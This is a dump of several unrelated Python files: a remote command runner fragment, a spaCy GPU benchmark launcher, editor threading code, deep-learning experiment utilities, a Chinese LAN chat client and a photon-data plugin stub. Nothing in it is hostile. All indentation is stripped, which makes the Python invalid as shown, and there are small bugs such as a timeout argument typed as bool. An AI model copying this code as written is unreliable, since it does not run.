self.print(msg)
if self.buffer:
output = self.buffer.getvalue().split('\n')
output += [msg]
return output
def run_all(self):
for machine in self.cluster.get_all():
try:
self.ipaddress = machine.ip_address
self.run_command()
except:
errorType, value, traceback = sys.exc_info()
self.print("### Unexpected Exception: " + str(errorType) + ": " + str(value) + "\n" + str(traceback))
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO, format="%(message)s")
import argparse
arg_parser = argparse.ArgumentParser("remoterunner executes remote commands on a given machine")
arg_parser.add_argument("--ipaddress", help="Address of machine to run commands on", required=True)
arg_parser.add_argument("--username", help="Username for logon to remote machine", default=None)
arg_parser.add_argument("--password", help="Password for logon to remote machine", default=None)
arg_parser.add_argument("--command", help="The command to run on the remote machine", default=None)
arg_parser.add_argument("--logfile", help="The name of logfile to write to", default=None)
arg_parser.add_argument("--timeout", type=bool, help="Timeout for the command in seconds (default 300 seconds)",
default=300)
args = arg_parser.parse_args()
with RemoteRunner(ipaddress=args.ipaddress, username=args.username, password=args.password,
command=args.command, verbose=True, logfile=args.logfile, timeout=args.timeout) as runner:
runner.run_command()
|
main_test_gpu.py
|
from multiprocessing import Process
import wikipedia
import spacy
import time
import sys
import os
#By Anton Rakos
#If the user has declared that a given node has a
#GPU with the appropriate drivers and tool kits install then they may run a test bench using the spaCy NLP tool kit.
spacy.prefer_gpu()
nlp = spacy.load('en_core_web_sm')
wikipedia.set_lang("en")
rando = str(wikipedia.random(pages=0))
page = wikipedia.page(rando)
def func0():
time_1 = time.time()
os.system('python3 data_0.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_0 ")
print("------------------------------")
def func1():
time_1 = time.time()
os.system('python3 data_1.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_1 ")
print("------------------------------")
def func2():
time_1 = time.time()
os.system('python3 data_2.py')
print("------------------------------")
print("GPU:: It took ", time_1, " seconds. data_2 ")
print("------------------------------")
def func3():
time_1 = time.time()
os.system('python3 data_3.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_3 ")
print("------------------------------")
def func4():
time_1 = time.time()
os.system('python3 data_4.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_4 ")
print("------------------------------")
def func5():
time_1 = time.time()
os.system('python3 data_5.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_5 ")
print("------------------------------")
def func6():
time_1 = time.time()
os.system('python3 data_6.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_6 ")
print("------------------------------")
def func7():
time_1 = time.time()
os.system('python3 data_7.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_7 ")
print("------------------------------")
if __name__=='__main__':
p0 = Process(target = func0)
p0.start()
p1 = Process(target = func1)
p1.start()
p2 = Process(target = func2)
p2.start()
p3 = Process(target = func3)
p3.start()
p4 = Process(target = func4)
p4.start()
p5 = Process(target = func5)
p5.start()
p6 = Process(target = func6)
p6.start()
#p7 = Process(target = func7)
#p7.start()
|
background.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# For Python 2to3 support.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
try:
import Queue as queue
except ImportError:
import queue
import signal
import sys
import threading
import time
import traceback
import app.profile
import app.render
class BackgroundThread(threading.Thread):
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.toBackground = None
self.fromBackground = None
def get(self):
return self.fromBackground.get()
def hasMessage(self):
# This thread yield (time.sleep(0)) dramatically improves Python3
# performance. Without this line empty() will be called far too often.
time.sleep(0)
return not self.fromBackground.empty()
def hasUserEvent(self):
time.sleep(0) # See note in hasMessage().
return not self.toBackground.empty()
def put(self, data):
self.toBackground.put(data)
def background(inputQueue, outputQueue):
cmdCount = 0
block = True
pid = os.getpid()
signalNumber = signal.SIGUSR1
while True:
try:
try:
program, message = inputQueue.get(block)
#profile = app.profile.beginPythonProfile()
if message == 'quit':
app.log.info('bg received quit message')
return
program.executeCommandList(message)
program.shortTimeSlice()
program.render()
# debugging only: program.showWindowHierarchy()
cmdCount += len(message)
outputQueue.put(program.program.frame.grabFrame() + (cmdCount,))
os.kill(pid, signalNumber)
#app.profile.endPythonProfile(profile)
time.sleep(0) # See note in hasMessage().
if not inputQueue.empty():
continue
except queue.Empty:
pass
block = program.longTimeSlice()
if block:
program.render()
outputQueue.put(program.program.frame.grabFrame() + (cmdCount,))
os.kill(pid, signalNumber)
except Exception as e:
app.log.exception(e)
app.log.error('bg thread exception', e)
errorType, value, tracebackInfo = sys.exc_info()
out = traceback.format_exception(errorType, value, tracebackInfo)
outputQueue.put(('exception', out))
os.kill(pid, signalNumber)
while True:
program, message = inputQueue.get()
if message == 'quit':
app.log.info('bg received quit message')
return
def startupBackground():
toBackground = queue.Queue()
fromBackground = queue.Queue()
bg = BackgroundThread(
target=background, args=(toBackground, fromBackground))
bg.setName('ci_edit_bg')
bg.setDaemon(True)
bg.start()
bg.toBackground = toBackground
bg.fromBackground = fromBackground
return bg
|
manager.py
|
from cloudbutton.multiprocessing import Process, Manager
def f(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
if __name__ == '__main__':
with Manager() as manager:
d = manager.dict()
l = manager.list(range(10))
p = Process(target=f, args=(d, l))
p.start()
p.join()
print(d.todict())
print(l.tolist())
|
exp_utils.py
|
#!/usr/bin/env python
# Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Iterable, Tuple, Any, Union
import os, sys
import subprocess
from multiprocessing import Process
import importlib.util
import pickle
import logging
from torch.utils.tensorboard import SummaryWriter
from collections import OrderedDict
import numpy as np
import torch
import pandas as pd
def split_off_process(target, *args, daemon: bool=False, **kwargs):
"""Start a process that won't block parent script.
No join(), no return value. If daemon=False: before parent exits, it waits for this to finish.
:param target: the target function of the process.
:params *args: args to pass to target.
:param daemon: if False: before parent exits, it waits for this process to finish.
:params **kwargs: kwargs to pass to target.
"""
p = Process(target=target, args=tuple(args), kwargs=kwargs, daemon=daemon)
p.start()
return p
def get_formatted_duration(seconds: float, format: str="hms") -> str:
"""Format a time in seconds.
:param format: "hms" for hours mins secs or "ms" for min secs.
"""
mins, secs = divmod(seconds, 60)
if format == "ms":
t = "{:d}m:{:02d}s".format(int(mins), int(secs))
elif format == "hms":
h, mins = divmod(mins, 60)
t = "{:d}h:{:02d}m:{:02d}s".format(int(h), int(mins), int(secs))
else:
raise Exception("Format {} not available, only 'hms' or 'ms'".format(format))
return t
class CombinedLogger(object):
"""Combine console and tensorboard logger and record system metrics.
"""
def __init__(self, name: str, log_dir: str, server_env: bool=True, fold: Union[int, str]="all"):
self.pylogger = logging.getLogger(name)
self.tboard = SummaryWriter(log_dir=os.path.join(log_dir, "tboard"))
self.log_dir = log_dir
self.fold = str(fold)
self.server_env = server_env
self.pylogger.setLevel(logging.DEBUG)
self.log_file = os.path.join(log_dir, "fold_"+self.fold, 'exec.log')
os.makedirs(os.path.dirname(self.log_file), exist_ok=True)
self.pylogger.addHandler(logging.FileHandler(self.log_file))
if not server_env:
self.pylogger.addHandler(ColorHandler())
else:
self.pylogger.addHandler(logging.StreamHandler())
self.pylogger.propagate = False
def __getattr__(self, attr):
"""delegate all undefined method requests to objects of
this class in order pylogger, tboard (first find first serve).
E.g., combinedlogger.add_scalars(...) should trigger self.tboard.add_scalars(...)
"""
for obj in [self.pylogger, self.tboard]:
if attr in dir(obj):
return getattr(obj, attr)
print("logger attr not found")
def set_logfile(self, fold: Union[int, str, None]=None, log_file: Union[str, None]=None):
if fold is not None:
self.fold = str(fold)
if log_file is None:
self.log_file = os.path.join(self.log_dir, "fold_"+self.fold, 'exec.log')
else:
self.log_file = log_file
os.makedirs(os.path.dirname(self.log_file), exist_ok=True)
for hdlr in self.pylogger.handlers:
hdlr.close()
self.pylogger.handlers = []
self.pylogger.addHandler(logging.FileHandler(self.log_file))
if not self.server_env:
self.pylogger.addHandler(ColorHandler())
else:
self.pylogger.addHandler(logging.StreamHandler())
def metrics2tboard(self, metrics, global_step=None, suptitle=None):
"""
:param metrics: {'train': dataframe, 'val':df}, df as produced in
evaluator.py.evaluate_predictions
"""
# print("metrics", metrics)
if global_step is None:
global_step = len(metrics['train'][list(metrics['train'].keys())[0]]) - 1
if suptitle is not None:
suptitle = str(suptitle)
else:
suptitle = "Fold_" + str(self.fold)
for key in ['train', 'val']:
# series = {k:np.array(v[-1]) for (k,v) in metrics[key].items() if not np.isnan(v[-1]) and not 'Bin_Stats' in k}
loss_series = {}
mon_met_series = {}
for tag, val in metrics[key].items():
val = val[-1] # maybe remove list wrapping, recording in evaluator?
if 'loss' in tag.lower() and not np.isnan(val):
loss_series["{}".format(tag)] = val
elif not np.isnan(val):
mon_met_series["{}".format(tag)] = val
self.tboard.add_scalars(suptitle + "/Losses/{}".format(key), loss_series, global_step)
self.tboard.add_scalars(suptitle + "/Monitor_Metrics/{}".format(key), mon_met_series, global_step)
self.tboard.add_scalars(suptitle + "/Learning_Rate", metrics["lr"], global_step)
return
def __del__(self): # otherwise might produce multiple prints e.g. in ipython console
for hdlr in self.pylogger.handlers:
hdlr.close()
self.pylogger.handlers = []
del self.pylogger
self.tboard.flush()
# close somehow prevents main script from exiting
# maybe revise this issue in a later pytorch version
#self.tboard.close()
def get_logger(exp_dir: str, server_env: bool=False) -> CombinedLogger:
"""
creates logger instance. writing out info to file, to terminal and to tensorboard.
:param exp_dir: experiment directory, where exec.log file is stored.
:param server_env: True if operating in server environment (e.g., gpu cluster)
:return: custom CombinedLogger instance.
"""
log_dir = os.path.join(exp_dir, "logs")
logger = CombinedLogger('medicaldetectiontoolkit', log_dir, server_env=server_env)
print("Logging to {}".format(logger.log_file))
return logger
def prep_exp(dataset_path, exp_path, server_env, use_stored_settings=True, is_training=True):
"""
I/O handling, creating of experiment folder structure. Also creates a snapshot of configs/model scripts and copies them to the exp_dir.
This way the exp_dir contains all info needed to conduct an experiment, independent to changes in actual source code. Thus, training/inference of this experiment can be started at anytime. Therefore, the model script is copied back to the source code dir as tmp_model (tmp_backbone).
Provides robust structure for cloud deployment.
:param dataset_path: path to source code for specific data set. (e.g. medicaldetectiontoolkit/lidc_exp)
:param exp_path: path to experiment directory.
:param server_env: boolean flag. pass to configs script for cloud deployment.
:param use_stored_settings: boolean flag. When starting training: If True, starts training from snapshot in existing experiment directory, else creates experiment directory on the fly using configs/model scripts from source code.
:param is_training: boolean flag. distinguishes train vs. inference mode.
:return:
"""
if is_training:
if use_stored_settings:
cf_file = import_module('cf_file', os.path.join(exp_path, 'configs.py'))
cf = cf_file.configs(server_env)
# in this mode, previously saved model and backbone need to be found in exp dir.
if not os.path.isfile(os.path.join(exp_path, 'model.py')) or \
not os.path.isfile(os.path.join(exp_path, 'backbone.py')):
raise Exception(
"Selected use_stored_settings option but no model and/or backbone source files exist in exp dir.")
cf.model_path = os.path.join(exp_path, 'model.py')
cf.backbone_path = os.path.join(exp_path, 'backbone.py')
else:
# this case overwrites settings files in exp dir, i.e., default_configs, configs, backbone, model
os.makedirs(exp_path, exist_ok=True)
# run training with source code info and copy snapshot of model to exp_dir for later testing (overwrite scripts if exp_dir already exists.)
subprocess.call('cp {} {}'.format('default_configs.py', os.path.join(exp_path, 'default_configs.py')),
shell=True)
subprocess.call(
'cp {} {}'.format(os.path.join(dataset_path, 'configs.py'), os.path.join(exp_path, 'configs.py')),
shell=True)
cf_file = import_module('cf_file', os.path.join(dataset_path, 'configs.py'))
cf = cf_file.configs(server_env)
subprocess.call('cp {} {}'.format(cf.model_path, os.path.join(exp_path, 'model.py')), shell=True)
subprocess.call('cp {} {}'.format(cf.backbone_path, os.path.join(exp_path, 'backbone.py')), shell=True)
if os.path.isfile(os.path.join(exp_path, "folds_ids.pickle")):
subprocess.call('rm {}'.format(os.path.join(exp_path, "folds_ids.pickle")), shell=True)
else:
# testing, use model and backbone stored in exp dir.
cf_file = import_module('cf_file', os.path.join(exp_path, 'configs.py'))
cf = cf_file.configs(server_env)
cf.model_path = os.path.join(exp_path, 'model.py')
cf.backbone_path = os.path.join(exp_path, 'backbone.py')
cf.exp_dir = exp_path
cf.test_dir = os.path.join(cf.exp_dir, 'test')
cf.plot_dir = os.path.join(cf.exp_dir, 'plots')
if not os.path.exists(cf.test_dir):
os.mkdir(cf.test_dir)
if not os.path.exists(cf.plot_dir):
os.mkdir(cf.plot_dir)
cf.experiment_name = exp_path.split("/")[-1]
cf.created_fold_id_pickle = False
return cf
def import_module(name: str, path: str):
"""
correct way of importing a module dynamically in python 3.
:param name: name given to module instance.
:param path: path to module.
:return: module: returned module instance.
"""
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
def set_params_flag(module: torch.nn.Module, flag: Tuple[str, Any], check_overwrite: bool = True) -> torch.nn.Module:
"""Set an attribute for all passed module parameters.
:param flag: tuple (str attribute name : attr value)
:param check_overwrite: if True, assert that attribute not already exists.
"""
for param in module.parameters():
if check_overwrite:
assert not hasattr(param, flag[0]), \
"param {} already has attr {} (w/ val {})".format(param, flag[0], getattr(param, flag[0]))
setattr(param, flag[0], flag[1])
return module
def parse_params_for_optim(net: torch.nn.Module, weight_decay: float = 0., exclude_from_wd: Iterable = ("norm",)) -> list:
"""Split network parameters into weight-decay dependent groups for the optimizer.
:param net: network.
:param weight_decay: weight decay value for the parameters that it is applied to. excluded parameters will have
weight decay 0.
:param exclude_from_wd: List of strings of parameter-group names to exclude from weight decay. Options: "norm", "bias".
:return:
"""
if weight_decay is None:
weight_decay = 0.
# pytorch implements parameter groups as dicts {'params': ...} and
# weight decay as p.data.mul_(1 - group['lr'] * group['weight_decay'])
norm_types = [torch.nn.BatchNorm1d, torch.nn.BatchNorm2d, torch.nn.BatchNorm3d,
torch.nn.InstanceNorm1d, torch.nn.InstanceNorm2d, torch.nn.InstanceNorm3d,
torch.nn.LayerNorm, torch.nn.GroupNorm, torch.nn.SyncBatchNorm, torch.nn.LocalResponseNorm]
level_map = {"bias": "weight",
"norm": "module"}
type_map = {"norm": norm_types}
exclude_from_wd = [str(name).lower() for name in exclude_from_wd]
exclude_weight_names = [k for k, v in level_map.items() if k in exclude_from_wd and v == "weight"]
exclude_module_types = tuple([type_ for k, v in level_map.items() if (k in exclude_from_wd and v == "module")
for type_ in type_map[k]])
if exclude_from_wd:
print("excluding {} from weight decay.".format(exclude_from_wd))
for module in net.modules():
if isinstance(module, exclude_module_types):
set_params_flag(module, ("no_wd", True))
for param_name, param in net.named_parameters():
if np.any([ename in param_name for ename in exclude_weight_names]):
setattr(param, "no_wd", True)
with_dec, no_dec = [], []
for param in net.parameters():
if hasattr(param, "no_wd") and param.no_wd == True:
no_dec.append(param)
else:
with_dec.append(param)
orig_ps = sum(p.numel() for p in net.parameters())
with_ps = sum(p.numel() for p in with_dec)
wo_ps = sum(p.numel() for p in no_dec)
assert orig_ps == with_ps + wo_ps, "orig n parameters {} unequals sum of with wd {} and w/o wd {}."\
.format(orig_ps, with_ps, wo_ps)
groups = [{'params': gr, 'weight_decay': wd} for (gr, wd) in [(no_dec, 0.), (with_dec, weight_decay)] if len(gr)>0]
return groups
class ModelSelector:
'''
saves a checkpoint after each epoch as 'last_state' (can be loaded to continue interrupted training).
saves the top-k (k=cf.save_n_models) ranked epochs. In inference, predictions of multiple epochs can be ensembled to improve performance.
'''
def __init__(self, cf, logger):
self.cf = cf
self.saved_epochs = [-1] * cf.save_n_models
self.logger = logger
def run_model_selection(self, net: torch.nn.Module, optimizer: torch.optim.Optimizer,
monitor_metrics: dict, epoch: int):
# take the mean over all selection criteria in each epoch
non_nan_scores = np.mean(np.array([[0 if (ii is None or np.isnan(ii)) else ii for ii in monitor_metrics['val'][sc]] for sc in self.cf.model_selection_criteria]), 0)
epochs_scores = [ii for ii in non_nan_scores[1:]]
# ranking of epochs according to model_selection_criterion
epoch_ranking = np.argsort(epochs_scores, kind="stable")[::-1] + 1 #epochs start at 1
# if set in configs, epochs < min_save_thresh are discarded from saving process.
epoch_ranking = epoch_ranking[epoch_ranking >= self.cf.min_save_thresh]
# check if current epoch is among the top-k epochs.
if epoch in epoch_ranking[:self.cf.save_n_models]:
save_dir = os.path.join(self.cf.fold_dir, '{}_best_checkpoint'.format(epoch))
if not os.path.exists(save_dir):
os.mkdir(save_dir)
torch.save(net.state_dict(), os.path.join(save_dir, 'params.pth'))
with open(os.path.join(save_dir, 'monitor_metrics.pickle'), 'wb') as handle:
pickle.dump(monitor_metrics, handle)
# save epoch_ranking to keep info for inference.
np.save(os.path.join(self.cf.fold_dir, 'epoch_ranking'), epoch_ranking[:self.cf.save_n_models])
np.save(os.path.join(save_dir, 'epoch_ranking'), epoch_ranking[:self.cf.save_n_models])
self.logger.info(
"saving current epoch {} at rank {}".format(epoch, np.argwhere(epoch_ranking == epoch)))
# delete params of the epoch that just fell out of the top-k epochs.
for se in [int(ii.split('_')[0]) for ii in os.listdir(self.cf.fold_dir) if 'best_checkpoint' in ii]:
if se in epoch_ranking[self.cf.save_n_models:]:
subprocess.call('rm -rf {}'.format(os.path.join(self.cf.fold_dir, '{}_best_checkpoint'.format(se))), shell=True)
self.logger.info('deleting epoch {} at rank {}'.format(se, np.argwhere(epoch_ranking == se)))
state = {
'epoch': epoch,
'state_dict': net.state_dict(),
'optimizer': optimizer.state_dict(),
}
# save checkpoint of current epoch.
save_dir = os.path.join(self.cf.fold_dir, 'last_checkpoint'.format(epoch))
if not os.path.exists(save_dir):
os.mkdir(save_dir)
torch.save(state, os.path.join(save_dir, 'params.pth'))
np.save(os.path.join(save_dir, 'epoch_ranking'), epoch_ranking[:self.cf.save_n_models])
with open(os.path.join(save_dir, 'monitor_metrics.pickle'), 'wb') as handle:
pickle.dump(monitor_metrics, handle)
def load_checkpoint(checkpoint_path: str, net: torch.nn.Module, optimizer: torch.optim.Optimizer) -> Tuple:
checkpoint = torch.load(os.path.join(checkpoint_path, 'params.pth'))
net.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
with open(os.path.join(checkpoint_path, 'monitor_metrics.pickle'), 'rb') as handle:
monitor_metrics = pickle.load(handle)
starting_epoch = checkpoint['epoch'] + 1
return starting_epoch, net, optimizer, monitor_metrics
def prepare_monitoring(cf):
"""
creates dictionaries, where train/val metrics are stored.
"""
metrics = {}
# first entry for loss dict accounts for epoch starting at 1.
metrics['train'] = OrderedDict()
metrics['val'] = OrderedDict()
metric_classes = []
if 'rois' in cf.report_score_level:
metric_classes.extend([v for k, v in cf.class_dict.items()])
if 'patient' in cf.report_score_level:
metric_classes.extend(['patient'])
for cl in metric_classes:
metrics['train'][cl + '_ap'] = [np.nan]
metrics['val'][cl + '_ap'] = [np.nan]
if cl == 'patient':
metrics['train'][cl + '_auc'] = [np.nan]
metrics['val'][cl + '_auc'] = [np.nan]
return metrics
def create_csv_output(results_list, cf, logger):
"""
Write out test set predictions to .csv file. output format is one line per prediction:
PatientID | PredictionID | [y1 x1 y2 x2 (z1) (z2)] | score | pred_classID
Note, that prediction coordinates correspond to images as loaded for training/testing and need to be adapted when
plotted over raw data (before preprocessing/resampling).
:param results_list: [[patient_results, patient_id], [patient_results, patient_id], ...]
"""
logger.info('creating csv output file at {}'.format(os.path.join(cf.test_dir, 'results.csv')))
predictions_df = pd.DataFrame(columns = ['patientID', 'predictionID', 'coords', 'score', 'pred_classID'])
for r in results_list:
pid = r[1]
#optionally load resampling info from preprocessing to match output predictions with raw data.
#with open(os.path.join(cf.exp_dir, 'test_resampling_info', pid), 'rb') as handle:
# resampling_info = pickle.load(handle)
for bix, box in enumerate(r[0][0]):
if box["box_type"] == "gt":
continue
assert box['box_type'] == 'det', box['box_type']
coords = box['box_coords']
score = box['box_score']
pred_class_id = box['box_pred_class_id']
out_coords = []
if score >= cf.min_det_thresh:
out_coords.append(coords[0]) #* resampling_info['scale'][0])
out_coords.append(coords[1]) #* resampling_info['scale'][1])
out_coords.append(coords[2]) #* resampling_info['scale'][0])
out_coords.append(coords[3]) #* resampling_info['scale'][1])
if len(coords) > 4:
out_coords.append(coords[4]) #* resampling_info['scale'][2] + resampling_info['z_crop'])
out_coords.append(coords[5]) #* resampling_info['scale'][2] + resampling_info['z_crop'])
predictions_df.loc[len(predictions_df)] = [pid, bix, out_coords, score, pred_class_id]
try:
fold = cf.fold
except:
fold = 'hold_out'
predictions_df.to_csv(os.path.join(cf.exp_dir, 'results_{}.csv'.format(fold)), index=False)
class _AnsiColorizer(object):
"""
A colorizer is an object that loosely wraps around a stream, allowing
callers to write text to the stream in a particular color.
Colorizer classes must implement C{supported()} and C{write(text, color)}.
"""
_colors = dict(black=30, red=31, green=32, yellow=33,
blue=34, magenta=35, cyan=36, white=37, default=39)
def __init__(self, stream):
self.stream = stream
@classmethod
def supported(cls, stream=sys.stdout):
"""
A class method that returns True if the current platform supports
coloring terminal output using this method. Returns False otherwise.
"""
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
except ImportError:
return False
else:
try:
try:
return curses.tigetnum("colors") > 2
except curses.error:
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
raise
# guess false in case of error
return False
def write(self, text, color):
"""
Write the given text to the stream in the given color.
@param text: Text to be written to the stream.
@param color: A string label for a color. e.g. 'red', 'white'.
"""
color = self._colors[color]
self.stream.write('\x1b[%sm%s\x1b[0m' % (color, text))
class ColorHandler(logging.StreamHandler):
def __init__(self, stream=sys.stdout):
super(ColorHandler, self).__init__(_AnsiColorizer(stream))
def emit(self, record):
msg_colors = {
logging.DEBUG: "green",
logging.INFO: "default",
logging.WARNING: "red",
logging.ERROR: "red"
}
color = msg_colors.get(record.levelno, "blue")
self.stream.write(record.msg + "\n", color)
|
client.py
|
# -*- coding: utf-8 -*-
# author: inspurer(月小水长)
# pc_type lenovo
# create_date: 2018/12/15
# file_name: client.py
# description: 月小水长,热血未凉
from socket import *
from threading import Thread
import wx
import os
from tkinter import filedialog
import tkinter
import json
import wx.lib.agw.customtreectrl as CT
root = tkinter.Tk()
root.withdraw() #****实现主窗口隐藏
serverPort = 6789
serverIp = "10.10.21.222"
class QICQ(wx.Frame):
def __init__(self):
global serverIp,serverPort
wx.Frame.__init__(self,parent=None,title="SocketQICQ",size=(600,400))
panel=wx.Panel(self)
self.isChoosedFile = False
self.dataOfChoosedFile = None
self.fileName = None
panel.SetBackgroundColour((0, 153, 255))
#python3.5.1 style的设置对wx.TreeCtrl()不起作用,改用ET
self.userListTree = CT.CustomTreeCtrl(parent=panel,pos=(10,10),size=(280,300),
style=wx.TR_FULL_ROW_HIGHLIGHT)
self.rootID = self.userListTree.AddRoot("已登录用户")
self.userListTree.SetBackgroundColour((224,255,255))
self.userListTree.AppendItem(self.rootID,"第一个子节点")
self.userListTree.AppendItem(self.rootID,"第二个子节点")
self.userListTree.ExpandAll()
self.userList = []
self.info = wx.Button(parent=panel,pos=(100,315),size=(80,40),label="说明")
self.info.SetBackgroundColour((224,255,255))
inputTip = wx.TextCtrl(parent=panel,pos=(300,10),size=(130,20),value="请输入你要发送的信息",
style=wx.TE_READONLY)
inputTip.SetForegroundColour((0,153,255))
inputTip.SetBackgroundColour((224,255,255))
self.input = wx.TextCtrl(parent=panel,pos=(300,30),size=(130,50))
self.input.SetForegroundColour((0,153,255))
self.input.SetBackgroundColour((224,255,255))
self.fileChooser = wx.Button(parent=panel,pos=(440,10),size=(130,70),label="选择文件")
self.fileChooser.SetBackgroundColour((224,255,255))
self.send = wx.Button(parent=panel,pos=(300,100),size=(275,50),label="发送")
self.send.SetBackgroundColour((224,255,255))
separation = wx.TextCtrl(parent=panel,pos=(290,170),size=(300,2))
separation.SetBackgroundColour((224, 255, 255))
receivedTip = wx.TextCtrl(parent=panel,pos=(300,190),size=(135,20),value="发送/接收到的消息列表",
style=wx.TE_READONLY)
receivedTip.SetForegroundColour((0,153,255))
receivedTip.SetBackgroundColour((224,255,255))
self.messageList = wx.TextCtrl(parent=panel,size=(275,120),pos=(300,210),
style=(wx.TE_MULTILINE|wx.HSCROLL|wx.TE_READONLY))
self.messageList.SetBackgroundColour((224, 255, 255))
#前景色,也就是字体颜色
self.messageList.SetForegroundColour((0, 153, 255))
self.sendMessage = ""
childThraed = Thread(target=self.socketHander)
childThraed.setDaemon(True)
childThraed.start()
self.Bind(wx.EVT_BUTTON,self.OnInfoClicked,self.info)
self.Bind(wx.EVT_BUTTON,self.OnSendClicked,self.send)
self.Bind(wx.EVT_BUTTON,self.onFileChooseClicked,self.fileChooser)
def OnInfoClicked(self,event):
wx.MessageDialog(self, u'''\r\n\r\n\r\n\t\t1、互联的环境必须是在同一个局域网\r\n
2、必须先在左边选择发送对象且发送消息不为空才能发送消息\r\n
3、选择根目录{已登录用户}是群发消息,选择单个是私发消息\r\n
4、刚登录时最后一个ip是你自己的ip\r\n''', u"警告", wx.OK).ShowModal()
def OnSendClicked(self,event):
self.sendMessage = self.input.Value
#print(self.sendMessage)
if len(self.sendMessage) == 0 and self.isChoosedFile == False:
wx.MessageDialog(self, u"请先输入(选择)待发送的消息(文件)", u"警告", wx.OK).ShowModal()
return None
selected = self.userListTree.GetSelection()
selected = self.userListTree.GetItemText(selected)
#print(selected)
if not selected:
wx.MessageDialog(self, u"请先选择用户或组", u"警告", wx.OK).ShowModal()
return None
#表示选择的是根节点,需要转发群消息
if selected == "已登录用户":
if self.isChoosedFile == False:
self.sendMessage = {
"type":"2",
"sourceIP":self.ip,
"destinationIP":selected,
"content":self.sendMessage
}
else:
self.sendMessage = {
"type":"5",
"sourceIP":self.ip,
"destinationIP":selected,
"filename":self.fileName,
"content":self.dataOfChoosedFile
}
else:
if self.isChoosedFile == False:
self.sendMessage = {
"type":"1",
"sourceIP":self.ip,
"destinationIP":selected,
"content":self.sendMessage
}
else:
self.sendMessage = {
"type": "4",
"sourceIP": self.ip,
"destinationIP": selected,
"filename": self.fileName,
"content": self.dataOfChoosedFile
}
def onFileChooseClicked(self,event):
filepath = filedialog.askopenfilename(title="请选择要发送的文件")
if len(filepath)>0:
filedicpath, fullflname = os.path.split(filepath)
self.fileName = fullflname
self.isChoosedFile = True
with open(filepath,"r") as f:
self.dataOfChoosedFile = f.read()
print(self.fileName)
pass
def socketHander(self):
self.clientSocket = socket(AF_INET, SOCK_STREAM)
self.clientSocket.connect((serverIp, serverPort))
self.clientSocket.settimeout(2)
self.ip,self.port = self.clientSocket.getsockname()
print("self ip",self.ip)
while True:
#发送消息
if len(self.sendMessage) == 0:
pass
else:
if self.isChoosedFile == True:
self.clientSocket.send(json.dumps(self.sendMessage).encode("utf-8"))
self.messageList.AppendText("文件[" + self.fileName + "]发送成功\r\n")
self.fileName = None
self.dataOfChoosedFile = None
self.isChoosedFile = False
self.sendMessage = ""
else:
self.clientSocket.send(json.dumps(self.sendMessage).encode("utf-8"))
self.messageList.AppendText("消息["+self.sendMessage.get("content")+"]发送成功\r\n")
self.input.SetLabelText("")
self.sendMessage = ""
try:
# 接收消息
receivedMessage = self.clientSocket.recv(1024)
receivedMessage = receivedMessage.decode("utf-8")
receivedMessage = json.loads(receivedMessage)
print(receivedMessage)
type = receivedMessage.get("type")
# 客户端接收服务端发来的转发消息
if type == "1":
print("客户端收到消息")
sourceIp = receivedMessage.get("sourceIP")
content = receivedMessage.get("content")
if sourceIp == self.ip:
pass
else:
self.messageList.AppendText("来自:["+sourceIp+"]的消息:["+content+"]\r\n")
elif type == "2":
# 客户端接收服务端发来的刷新列表请求
self.userList = receivedMessage.get("content")
self.setUserList()
elif type == "3":
filename = receivedMessage.get("filename")
print("rrrr",filename)
with open(filename,"w") as f:
f.write(receivedMessage.get("content"))
except:
print("等待数据...")
pass
pass
def setUserList(self):
self.userListTree.DeleteChildren(self.rootID)
for user in self.userList:
# if user == self.ip:
# continue
self.userListTree.AppendItem(self.rootID,user)
pass
def OnClosed(self,event):
endMessage ={
"type":"3",
"content":"bye"
}
self.clientSocket.send(json.dumps(endMessage).encode("utf-8"))
self.Destroy()
if __name__ == '__main__':
global serverIp
serverIp = input("请输入服务器ip")
app = wx.App()
frame = QICQ()
frame.Bind(wx.EVT_CLOSE,frame.OnClosed)
frame.Show()
app.MainLoop()
app.OnExit()
|
baseplugin.py
|
import threading
import queue
import time
import numpy as np
from implotwidget import ImplotWidget
# Photon data. Using fixed size numpy arrays right now.
class PhotonData(object):
def __init__(self, chunksize = 244):
# x, y, and pulse height
self.x = np.zeros(chunksize, dtype = np.uint16)
self.y = np.zeros(chunksize, dtype = np.uint16)
self.p = np.zeros(chunksize, dtype = np.uint16)
#self.seg = np.zeros(chunksize, dtype = np.uint8)
# index of detector segment (one segment per photondata chunk)
self.segment = 0
# Number of valid items in data
self.len = 0
class PluginConfig(object):
def __init__(self):
"""Configuration for each detector segment
xbits, ybits, and pbits must have length that matches segments"""
# Segment configurations
self.segment_configs = [SegmentConfig(xbit = 8, ybit = 8, pbit = 8, segment = 0)]
